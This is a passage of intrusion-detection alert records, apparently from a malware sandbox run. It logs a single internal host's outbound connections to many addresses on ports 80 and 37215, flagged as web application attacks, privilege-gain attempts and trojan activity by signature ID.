              Source Port:58622
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2377.40.58.2351878802025883 01/02/24-06:25:02.046176
              SID:2025883
              Source Port:51878
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2338.181.35.21934712802025883 01/02/24-06:24:09.179650
              SID:2025883
              Source Port:34712
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2357.180.216.7335048802025883 01/02/24-06:25:30.173193
              SID:2025883
              Source Port:35048
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23175.27.12.21960064802025883 01/02/24-06:25:32.237664
              SID:2025883
              Source Port:60064
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2341.0.84.3441028372152835222 01/02/24-06:24:06.080918
              SID:2835222
              Source Port:41028
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.2399.142.66.14860348802030092 01/02/24-06:25:29.576053
              SID:2030092
              Source Port:60348
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.232.17.176.1145384802030092 01/02/24-06:25:15.290469
              SID:2030092
              Source Port:45384
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2323.222.136.16659240802025883 01/02/24-06:25:34.867652
              SID:2025883
              Source Port:59240
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2318.142.2.15938786802025883 01/02/24-06:24:24.307205
              SID:2025883
              Source Port:38786
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23103.57.209.4560092802030092 01/02/24-06:25:10.115853
              SID:2030092
              Source Port:60092
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2372.37.218.19948926802030092 01/02/24-06:24:05.713034
              SID:2030092
              Source Port:48926
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2354.87.227.16435480802030092 01/02/24-06:25:22.000530
              SID:2030092
              Source Port:35480
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2346.101.163.10735924802030092 01/02/24-06:25:11.820546
              SID:2030092
              Source Port:35924
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2369.80.206.8755282802025883 01/02/24-06:24:19.154384
              SID:2025883
              Source Port:55282
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2358.152.149.559232802030092 01/02/24-06:24:41.116385
              SID:2030092
              Source Port:59232
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2354.150.52.14052998802030092 01/02/24-06:24:24.012270
              SID:2030092
              Source Port:52998
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23103.39.16.6847170802030092 01/02/24-06:24:15.125482
              SID:2030092
              Source Port:47170
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23221.153.44.20137018802025883 01/02/24-06:25:09.681419
              SID:2025883
              Source Port:37018
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.232.21.48.24839876802030092 01/02/24-06:24:51.823067
              SID:2030092
              Source Port:39876
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2377.242.107.19653440802030092 01/02/24-06:25:25.327513
              SID:2030092
              Source Port:53440
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23104.83.91.4142372802030092 01/02/24-06:24:06.101527
              SID:2030092
              Source Port:42372
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23162.159.129.10357618802030092 01/02/24-06:24:03.166357
              SID:2030092
              Source Port:57618
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23134.0.11.20345208802025883 01/02/24-06:24:03.999636
              SID:2025883
              Source Port:45208
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23104.80.89.1760656802025883 01/02/24-06:25:31.932213
              SID:2025883
              Source Port:60656
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2323.33.51.1137284802030092 01/02/24-06:25:10.230054
              SID:2030092
              Source Port:37284
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2323.48.76.9154442802030092 01/02/24-06:25:30.270726
              SID:2030092
              Source Port:54442
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2352.29.37.5835934802030092 01/02/24-06:25:21.265685
              SID:2030092
              Source Port:35934
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2351.138.221.22455554802030092 01/02/24-06:25:00.997015
              SID:2030092
              Source Port:55554
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23151.101.7.16645530802025883 01/02/24-06:23:49.491267
              SID:2025883
              Source Port:45530
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23104.82.113.6149624802030092 01/02/24-06:23:55.139649
              SID:2030092
              Source Port:49624
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23104.19.229.17639714802025883 01/02/24-06:24:40.719393
              SID:2025883
              Source Port:39714
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23123.60.116.9758084802025883 01/02/24-06:24:45.347164
              SID:2025883
              Source Port:58084
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2374.48.45.14649620802025883 01/02/24-06:24:50.099124
              SID:2025883
              Source Port:49620
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2313.239.48.11535360802030092 01/02/24-06:24:04.056293
              SID:2030092
              Source Port:35360
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23185.85.0.13949486802025883 01/02/24-06:24:38.209929
              SID:2025883
              Source Port:49486
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23108.186.100.20951226802025883 01/02/24-06:23:54.821481
              SID:2025883
              Source Port:51226
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2334.225.232.16551466802025883 01/02/24-06:24:15.088251
              SID:2025883
              Source Port:51466
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23157.70.251.2337718802030092 01/02/24-06:24:27.439650
              SID:2030092
              Source Port:37718
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23146.148.255.22835330802030092 01/02/24-06:25:03.972570
              SID:2030092
              Source Port:35330
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23107.22.7.9054290802025883 01/02/24-06:25:15.619385
              SID:2025883
              Source Port:54290
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23194.8.215.9047106802030092 01/02/24-06:25:39.116051
              SID:2030092
              Source Port:47106
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2323.208.169.837612802030092 01/02/24-06:24:14.264263
              SID:2030092
              Source Port:37612
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2323.198.222.19256304802030092 01/02/24-06:24:18.028834
              SID:2030092
              Source Port:56304
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2377.46.139.24443154802025883 01/02/24-06:25:02.038352
              SID:2025883
              Source Port:43154
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2345.148.36.4256504802030092 01/02/24-06:24:01.272066
              SID:2030092
              Source Port:56504
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2352.51.210.25354244802030092 01/02/24-06:25:26.161554
              SID:2030092
              Source Port:54244
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2313.227.73.8552698802030092 01/02/24-06:25:34.683145
              SID:2030092
              Source Port:52698
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2377.75.231.12448474802025883 01/02/24-06:23:59.226697
              SID:2025883
              Source Port:48474
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2345.66.79.13355714802030092 01/02/24-06:24:14.281778
              SID:2030092
              Source Port:55714
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23111.87.115.15347612802025883 01/02/24-06:25:25.281636
              SID:2025883
              Source Port:47612
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23171.244.56.10744564802025883 01/02/24-06:24:03.532179
              SID:2025883
              Source Port:44564
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2334.18.64.5447396802025883 01/02/24-06:24:30.779179
              SID:2025883
              Source Port:47396
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2349.44.196.20855840802025883 01/02/24-06:24:41.307799
              SID:2025883
              Source Port:55840
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23209.235.140.22455632802025883 01/02/24-06:24:48.911367
              SID:2025883
              Source Port:55632
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2334.107.170.11651938802025883 01/02/24-06:24:04.121161
              SID:2025883
              Source Port:51938
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2335.183.139.12937922802025883 01/02/24-06:25:29.610631
              SID:2025883
              Source Port:37922
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2323.218.15.4344830802030092 01/02/24-06:24:34.799253
              SID:2030092
              Source Port:44830
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23154.213.63.23060686802025883 01/02/24-06:24:37.365549
              SID:2025883
              Source Port:60686
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2373.116.187.14544290802030092 01/02/24-06:24:46.089608
              SID:2030092
              Source Port:44290
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23154.46.166.18836382802030092 01/02/24-06:24:10.948725
              SID:2030092
              Source Port:36382
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2366.22.55.12933832802030092 01/02/24-06:23:51.506025
              SID:2030092
              Source Port:33832
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23156.235.98.939512372152835222 01/02/24-06:24:15.985357
              SID:2835222
              Source Port:39512
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.2352.31.77.17848046802025883 01/02/24-06:25:05.043017
              SID:2025883
              Source Port:48046
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2334.242.70.14342204802025883 01/02/24-06:24:43.208181
              SID:2025883
              Source Port:42204
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23157.52.181.6140930802030092 01/02/24-06:25:29.722171
              SID:2030092
              Source Port:40930
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23160.121.60.20546956802025883 01/02/24-06:23:51.701184
              SID:2025883
              Source Port:46956
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23158.94.0.20659592802025883 01/02/24-06:24:09.082311
              SID:2025883
              Source Port:59592
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2318.139.66.24949188802025883 01/02/24-06:24:49.080776
              SID:2025883
              Source Port:49188
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2318.66.27.18250544802030092 01/02/24-06:24:59.193137
              SID:2030092
              Source Port:50544
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2334.126.113.7654070802025883 01/02/24-06:25:15.540979
              SID:2025883
              Source Port:54070
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23212.8.247.7039420802025883 01/02/24-06:24:59.257113
              SID:2025883
              Source Port:39420
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2318.172.204.12456566802025883 01/02/24-06:24:59.388502
              SID:2025883
              Source Port:56566
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2352.196.15.13145438802030092 01/02/24-06:25:02.277841
              SID:2030092
              Source Port:45438
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23203.170.84.9841608802030092 01/02/24-06:24:05.853329
              SID:2030092
              Source Port:41608
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23217.160.215.20551516802025883 01/02/24-06:24:23.994544
              SID:2025883
              Source Port:51516
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23145.236.36.12840926802030092 01/02/24-06:24:59.212800
              SID:2030092
              Source Port:40926
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2362.244.41.14754538802030092 01/02/24-06:25:25.284302
              SID:2030092
              Source Port:54538
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2338.6.180.18441692802025883 01/02/24-06:25:01.064194
              SID:2025883
              Source Port:41692
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2323.3.111.16147366802025883 01/02/24-06:25:43.020357
              SID:2025883
              Source Port:47366
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2377.246.183.3046272802025883 01/02/24-06:24:55.948920
              SID:2025883
              Source Port:46272
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23212.109.194.4333828802025883 01/02/24-06:24:23.748097
              SID:2025883
              Source Port:33828
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23107.172.87.20751544802025883 01/02/24-06:24:55.853118
              SID:2025883
              Source Port:51544
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23139.59.72.23049116802030092 01/02/24-06:25:11.932825
              SID:2030092
              Source Port:49116
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2338.181.35.21934372802030092 01/02/24-06:24:01.259878
              SID:2030092
              Source Port:34372
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2343.192.122.6537836802030092 01/02/24-06:25:44.376815
              SID:2030092
              Source Port:37836
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2361.220.62.14550398802030092 01/02/24-06:24:33.218083
              SID:2030092
              Source Port:50398
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23124.160.184.25432982802025883 01/02/24-06:24:49.075744
              SID:2025883
              Source Port:32982
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2338.173.142.9934518802030092 01/02/24-06:24:45.911157
              SID:2030092
              Source Port:34518
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23186.88.83.19454168802025883 01/02/24-06:25:15.957336
              SID:2025883
              Source Port:54168
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23101.42.248.24039924802030092 01/02/24-06:24:43.377309
              SID:2030092
              Source Port:39924
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2334.216.109.859862802025883 01/02/24-06:24:27.341329
              SID:2025883
              Source Port:59862
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23102.130.122.21740696802030092 01/02/24-06:24:58.885496
              SID:2030092
              Source Port:40696
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2323.57.78.17447542802025883 01/02/24-06:25:36.406858
              SID:2025883
              Source Port:47542
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23104.230.152.22549976802025883 01/02/24-06:24:24.820851
              SID:2025883
              Source Port:49976
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23166.161.129.1740674802025883 01/02/24-06:24:44.925325
              SID:2025883
              Source Port:40674
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2375.187.170.24035348802030092 01/02/24-06:24:30.620216
              SID:2030092
              Source Port:35348
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2350.212.190.9749434802025883 01/02/24-06:25:07.021195
              SID:2025883
              Source Port:49434
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23154.12.30.8341074802025883 01/02/24-06:25:38.407130
              SID:2025883
              Source Port:41074
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23156.253.36.648376372152829579 01/02/24-06:24:16.442516
              SID:2829579
              Source Port:48376
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.234.152.153.16453294802030092 01/02/24-06:23:55.535212
              SID:2030092
              Source Port:53294
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.232.20.206.6947260802030092 01/02/24-06:25:06.855559
              SID:2030092
              Source Port:47260
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2369.192.43.5855492802025883 01/02/24-06:25:21.993012
              SID:2025883
              Source Port:55492
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23156.254.75.5454612372152829579 01/02/24-06:25:31.710967
              SID:2829579
              Source Port:54612
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.2399.16.143.12833176802025883 01/02/24-06:24:14.071830
              SID:2025883
              Source Port:33176
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.235.135.156.633424802030092 01/02/24-06:25:30.155873
              SID:2030092
              Source Port:33424
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2385.221.227.12437694802030092 01/02/24-06:24:18.042374
              SID:2030092
              Source Port:37694
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23167.172.137.11148674802025883 01/02/24-06:23:49.370306
              SID:2025883
              Source Port:48674
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23154.214.96.7060798802030092 01/02/24-06:24:05.858026
              SID:2030092
              Source Port:60798
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2324.90.220.12451082802030092 01/02/24-06:25:34.883177
              SID:2030092
              Source Port:51082
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2346.4.102.25247674802025883 01/02/24-06:25:43.105983
              SID:2025883
              Source Port:47674
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2323.204.125.10656392802025883 01/02/24-06:24:13.920039
              SID:2025883
              Source Port:56392
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23173.234.100.23044204802025883 01/02/24-06:24:40.616364
              SID:2025883
              Source Port:44204
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23185.18.81.6639906802025883 01/02/24-06:25:01.307707
              SID:2025883
              Source Port:39906
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23118.232.97.5137750802025883 01/02/24-06:24:56.010020
              SID:2025883
              Source Port:37750
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.238.134.23.4358860802025883 01/02/24-06:24:27.781954
              SID:2025883
              Source Port:58860
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23213.136.91.1739410802025883 01/02/24-06:24:04.299968
              SID:2025883
              Source Port:39410
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23164.132.227.17152970802025883 01/02/24-06:25:19.078205
              SID:2025883
              Source Port:52970
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23110.161.237.5746168802030092 01/02/24-06:25:25.756167
              SID:2030092
              Source Port:46168
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2318.164.18.3348318802030092 01/02/24-06:25:38.054989
              SID:2030092
              Source Port:48318
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2335.209.88.19054520802025883 01/02/24-06:24:45.913931
              SID:2025883
              Source Port:54520
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2359.49.86.22544734802025883 01/02/24-06:24:27.489026
              SID:2025883
              Source Port:44734
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23103.131.18.24355884802025883 01/02/24-06:25:21.511351
              SID:2025883
              Source Port:55884
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23108.186.216.18145040802030092 01/02/24-06:23:51.959819
              SID:2030092
              Source Port:45040
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2350.87.38.1737480802025883 01/02/24-06:24:23.653878
              SID:2025883
              Source Port:37480
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23104.86.91.9035656802030092 01/02/24-06:24:50.099510
              SID:2030092
              Source Port:35656
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2385.215.117.2442578802025883 01/02/24-06:24:01.338021
              SID:2025883
              Source Port:42578
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2389.212.109.24042828802025883 01/02/24-06:24:42.987046
              SID:2025883
              Source Port:42828
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23152.200.138.8146794802030092 01/02/24-06:24:51.767454
              SID:2030092
              Source Port:46794
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23144.126.206.15750982802030092 01/02/24-06:24:28.177953
              SID:2030092
              Source Port:50982
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2327.54.141.22460562802025883 01/02/24-06:24:30.783293
              SID:2025883
              Source Port:60562
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2351.255.91.12053876802030092 01/02/24-06:25:02.258701
              SID:2030092
              Source Port:53876
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23108.158.129.15660976802030092 01/02/24-06:24:55.937734
              SID:2030092
              Source Port:60976
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2359.151.128.1748314802030092 01/02/24-06:24:46.386584
              SID:2030092
              Source Port:48314
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2374.39.214.2346062802030092 01/02/24-06:25:15.627181
              SID:2030092
              Source Port:46062
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2357.180.62.6834572802025883 01/02/24-06:24:44.984670
              SID:2025883
              Source Port:34572
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2351.75.21.17840480802030092 01/02/24-06:25:02.016731
              SID:2030092
              Source Port:40480
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.238.217.69.18058726802030092 01/02/24-06:24:01.420268
              SID:2030092
              Source Port:58726
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2386.107.30.11541714802025883 01/02/24-06:25:35.089932
              SID:2025883
              Source Port:41714
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2391.194.11.19152908802030092 01/02/24-06:24:17.758398
              SID:2030092
              Source Port:52908
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23154.204.118.16159748802025883 01/02/24-06:24:50.106168
              SID:2025883
              Source Port:59748
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2394.152.11.20858652802030092 01/02/24-06:25:38.297923
              SID:2030092
              Source Port:58652
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2313.52.177.10058232802025883 01/02/24-06:24:00.958032
              SID:2025883
              Source Port:58232
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23206.233.253.22452608802030092 01/02/24-06:24:09.052927
              SID:2030092
              Source Port:52608
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2323.209.26.22960854802030092 01/02/24-06:24:32.802584
              SID:2030092
              Source Port:60854
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23207.91.250.5347036802025883 01/02/24-06:24:05.701901
              SID:2025883
              Source Port:47036
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23195.210.122.20639926802030092 01/02/24-06:25:42.425489
              SID:2030092
              Source Port:39926
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2389.116.58.16258488802030092 01/02/24-06:24:18.153621
              SID:2030092
              Source Port:58488
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2338.55.6.5853198802030092 01/02/24-06:25:09.906087
              SID:2030092
              Source Port:53198
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23185.124.143.18839152802030092 01/02/24-06:23:52.102637
              SID:2030092
              Source Port:39152
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2334.88.138.1944478802025883 01/02/24-06:25:30.159443
              SID:2025883
              Source Port:44478
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23107.167.54.15750366802025883 01/02/24-06:25:31.230783
              SID:2025883
              Source Port:50366
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23121.36.115.24947442802030092 01/02/24-06:23:55.420371
              SID:2030092
              Source Port:47442
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2351.17.132.4749620802030092 01/02/24-06:24:34.942338
              SID:2030092
              Source Port:49620
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23155.159.137.860496802030092 01/02/24-06:24:33.306234
              SID:2030092
              Source Port:60496
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23209.97.134.8644200802030092 01/02/24-06:24:43.211070
              SID:2030092
              Source Port:44200
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23146.126.59.11357290802030092 01/02/24-06:24:34.936317
              SID:2030092
              Source Port:57290
              Destination Port:80
              Protocol:TCP
